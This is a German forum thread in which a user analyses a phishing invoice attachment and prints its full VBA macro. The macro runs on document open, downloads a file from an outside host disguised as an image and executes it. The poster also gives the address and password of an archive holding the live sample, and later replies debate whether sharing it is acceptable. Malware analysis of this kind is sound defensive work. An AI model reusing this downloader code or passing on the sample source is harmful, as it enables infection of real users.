Spaß mit reverse engineering

wladislav1

wladislav1

gehört zum Inventar
Hey,
wir hatten eine Email bekommen, dass wir angeblich Schulden hätten. Im Anhang war eine .doc mit dem Namen "Rechnung_12472381.doc".
Ich hatte mir das Teil mal genauer angeschaut es stellte sich heraus, dass es ein macro hat. Das Macro wurde in Visual Basic geschrieben mit folgendem Code:
verborgener Text:
Code: 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
YVFDXNTOHWT
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Function GRPGFHKOSHI(ByVal SVBUWHUNJWT As String, ByVal CMYATDWOVAO As String) As Boolean
     Dim TPOORILDSDL As Object, VGNOIZXJPBH As Long, MOCHEOHRDMH As Long, EBLGIQMBFDP() As Byte

    Set TPOORILDSDL = CreateObject("Microsoft.XmlHttp")
    TPOORILDSDL.Open "GET", SVBUWHUNJWT, False
    TPOORILDSDL.Send "123"

    Do While TPOORILDSDL.readyState <> 4
    DoEvents
    Loop

    EBLGIQMBFDP = TPOORILDSDL.responseBody

    MOCHEOHRDMH = FreeFile
    If Dir(CMYATDWOVAO) <> "" Then Kill CMYATDWOVAO
    Open CMYATDWOVAO For Binary As #MOCHEOHRDMH
    Put #MOCHEOHRDMH, , EBLGIQMBFDP
    Close #MOCHEOHRDMH
    
    Dim RRSNFVXRLLM
    RRSNFVXRLLM = Shell(CMYATDWOVAO, 1)

    Set TPOORILDSDL = Nothing
     
End Function
Sub YVFDXNTOHWT()
    GRPGFHKOSHI "http://carhiresoft.com/img/calc.png", Environ("USERPROFILE") & "\useradmin.com"
End Sub
Die letzte Zeile ruft ""http://carhiresoft.com/img/calc.png", Environ("USERPROFILE") & "\useradmin.com"" auf.
carhiresoft.com ist eine leere und harmlose seite, der Link der zum Bild führt, downloaded jedoch eine Datei Names "payload.exe"
Virustotal.com zu "paylaod.exe"
Ganz lustig alles in allem.
Sollte sich jemand dafür interresieren, habe ich die .doc und den VB code in ein Archiv auf meinem Webspace geworfen:
saires.de/server/evil.7z passwort:"donteatme"

Hab die Seite bei Google Safe Browsing angezeigt.
 
Dein Interesse ist ok, aber den Virus in welcher Form auch immer weiterzuverteilen ist reichlich grenzwertig und du kannst damit auch als Verursacher haftbar gemacht werden. :rolleyes:
 
Nun, es ist ja kein klickbarer Link - wer sich die Datei holt, weiß, was er sich holt, da er vorher den Text gelesen hat.
Das sehe ich daher nicht so kritisch.
 
Wenn du das für dich und dein Forum vereinbaren kannst. Bei mir, anderweitig und größeren Foren gibt es seit geraumer Zeit eine Null-Toleranzgrenze. Es gibt zu viele Pappnasen, die sich jetzt animiert fühlen, aus welchem Leichtsinn auch immer, sich aus dubiosen Quellen eine Reversing Software angeln und das auch versuchen wollen. Die Ergebnisliste bei VT spricht auch ein entsprechendes Ergebnis aus.

MfG
 
Wenn das jemand will, werde ich es nicht verhindern. Und ist ja auch nicht so, dass hier jeden Tag zehn Themen dieser Art aufschlagen. Von daher sehe ich das entsprechend entspannt.
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
Oben